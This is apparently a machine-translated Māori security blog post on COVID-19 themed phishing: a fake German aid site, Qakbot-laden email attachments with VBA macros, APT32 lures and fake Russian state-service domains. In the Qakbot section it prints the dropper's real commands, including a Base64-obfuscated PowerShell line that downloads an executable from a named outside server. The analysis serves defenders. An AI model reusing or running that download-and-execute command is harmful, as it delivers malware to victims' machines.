Kei te whakamahi tonu nga kaiwhaiwhai i te kaupapa COVID-19, ka nui ake te whakatuma mo nga kaiwhakamahi e aro nui ana ki nga mea katoa e pa ana ki te mate uruta. IN Kua korerohia e matou he aha nga momo kino i puta mai i te wa o te coronavirus, a i tenei ra ka korero matou mo nga tikanga hangarau hapori kua tutaki nga kaiwhakamahi i nga whenua rereke, tae atu ki a Russia. Ko nga ahuatanga whanui me nga tauira kei raro i te tapahi.
Kia mahara ki roto I korero matou mo te meka e pai ana te iwi ki te panui ehara i te mea mo te coronavirus me te huarahi o te mate uruta, engari mo nga mahi tautoko putea? Anei he tauira pai. I kitea he whakaeke hītinihanga whakamere i te whenua Tiamana o North Rhine-Westphalia, NRW ranei. I hangaia e te hunga whakaeke he kape o te paetukutuku a te Manatu ohaoha (), ka taea e tetahi te tono mo te awhina putea. Kei te noho tonu taua kaupapa, a ka puta he painga mo nga kaipahua. I te rironga o nga raraunga whaiaro o o ratou patunga, ka tono ratou ki runga i te paetukutuku a te minita tuturu, engari i tohu etahi atu korero peeke. E ai ki nga korero whaimana, 4 mano nga tono rūpahu i tukuna kia kitea ra ano te kaupapa. Ko te mutunga mai, ko te $109 miriona taara mo nga tangata whenua kua pa ki roto i nga ringa o te hunga tinihanga.
Kei te pirangi koe ki tetahi whakamatautau kore utu mo COVID-19?
Ko tetahi atu tauira nui o te hītinihanga kaupapa-coronavirus ko i roto i nga imeera. Ko nga panui i aro ki nga kaiwhakamahi me te tuku ki te whakamatau kore utu mo te mate coronavirus. I roto i te taapiri o enei he wa ano o Trickbot/Qakbot/Qbot. A, i te wa i timata ai te hunga e hiahia ana ki te tirotiro i to ratau hauora ki te "whakakii i te puka taapiri," ka tangohia he tuhinga kino ki te rorohiko. Hei karo i nga whakamatautau kirikiri, ka timata te tuhinga ki te tango i te huaketo matua i muri noa iho i etahi wa, i te wa i tino mohio nga punaha whakamarumaru kaore he mahi kino e puta.
He ngawari hoki te whakatenatena i te nuinga o nga kaiwhakamahi kia taea te tonotono. Hei mahi i tenei, i whakamahia he tinihanga paerewa: ki te whakaki i te paatai, me whakaahei koe i nga tonotono, ko te tikanga me whakahaere he tuhi VBA.
Ka taea e koe te kite, ko te tuhinga VBA he mea huna mai i nga wheori.
Kei a Windows tetahi waahanga tatari e tatari ana te tono /T <hekona> i mua i te whakaae ki te whakautu "Ae" taunoa. I a maatau, i tatari te tuhinga mo te 65 hēkona i mua i te whakakore i nga konae rangitahi:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
A, i te wa e tatari ana, i tangohia te malware. I whakarewahia he tuhinga PowerShell motuhake mo tenei:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Whai muri i te wetewete i te uara Base64, ka tangohia e te tuhinga PowerShell te tatau o muri kei runga i te tūmau tukutuku i taumanutia i mua mai i Tiamana:
http://automatischer-staubsauger.com/feature/777777.pngka tiakina i raro i te ingoa:
C:UsersPublictmpdirfile1.exe
kōpaki ‘C:UsersPublictmpdir’ ka mukua i te wa e whakahaere ana i te konae 'tmps1.bat' kei roto te whakahau cmd /c mkdir ""C:UsersPublictmpdir"".
Ko te whakaeke i nga tari a te kawanatanga
I tua atu, ko nga kaitirotiro FireEye i korero tata nei he whakaekenga APT32 e aro ana ki nga hanganga kawanatanga i Wuhan, me te Manatu Whakahaere ohorere a Hainamana. Ko tetahi o nga RTF kua tohatohahia he hononga ki tetahi tuhinga New York Times e tika ana . Heoi, i runga i te panuitanga, i tangohia mai te malware (i tohuhia e nga kaitirotiro FireEye te tauira ko METALJACK).
Ko te mea whakamiharo, i te wa o te kitenga, kaore tetahi o nga wheori i kitea tenei tauira, e ai ki a Virustotal.
Ina ngaro nga paetukutuku mana
Ko te tauira tino whakamiharo o te whakaeke hītinihanga i puta ki Ruhia i tera ra. Ko te take i tohua ai he painga kua roa e tatari ana mo nga tamariki 3 ki te 16 tau. I te wa i panuitia ai te tiimatanga ki te whakaae i nga tono i te 12 o Mei 2020, e hia miriona i tere ki te paetukutuku a State Services mo te awhina kua roa e tatari ana, a, ka heke iho te tomokanga kaore he kino atu i te whakaekenga DDoS ngaio. I te korero a te perehitini "Kaore e taea e nga Ratonga Kawanatanga te kaha ki te rere o nga tono," ka timata nga tangata ki te korero i runga ipurangi mo te whakarewatanga o tetahi waahi rereke mo te whakaae tono.
Ko te raruraru he maha nga waahi i timata ki te mahi i te wa kotahi, a ko tetahi, ko te mea pono i te posobie16.gosuslugi.ru, ka whakaae ki nga tono, he maha atu. .
I kitea e nga hoa mahi mai i SearchInform tata ki te 30 nga rohe tinihanga hou i te rohe .ru. Ko te Kamupene Infosecurity me te Softline kua whai i te neke atu i te 70 nga paetukutuku ratonga a te kawanatanga rūpahu mai i te timatanga o Paenga-whawha. Ka rawekehia e o raatau kaihanga nga tohu mohio me te whakamahi i nga huinga o nga kupu gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, me era atu.
Hype and social engineering
Ko enei tauira katoa e whakapumau ana kei te angitu nga kaiwhaiwhai i te kaupapa o te coronavirus. A, ko te nui ake o te raruraru hapori me te nui ake o nga take kaore i te marama, ka nui ake te tupono o nga kaipahua ki te tahae i nga raraunga nui, ki te akiaki i nga tangata ki te tuku moni i a raatau ake, ki te tarai noa ranei i etahi atu rorohiko.
A i te mea kua akiakihia e te mate urutaru nga taangata kaore i rite ki te mahi mai i te kaainga i te kaainga, ehara i te mea ko te tangata ake, engari ko nga raraunga umanga kei te tupono. Hei tauira, ina tata nei i tukuna ano nga kaiwhakamahi Microsoft 365 (Ko Office 365 i mua) ki te whakaeke hītinihanga. I whiwhi nga tangata i nga karere reo "ngaro" nui hei taapiri ki nga reta. Heoi, ko nga konae he wharangi HTML i tukuna nga patunga o te whakaeke ki . Ko te mutunga, ka ngaro te uru me te whakararu i nga raraunga katoa mai i te kaute.
Source: will.com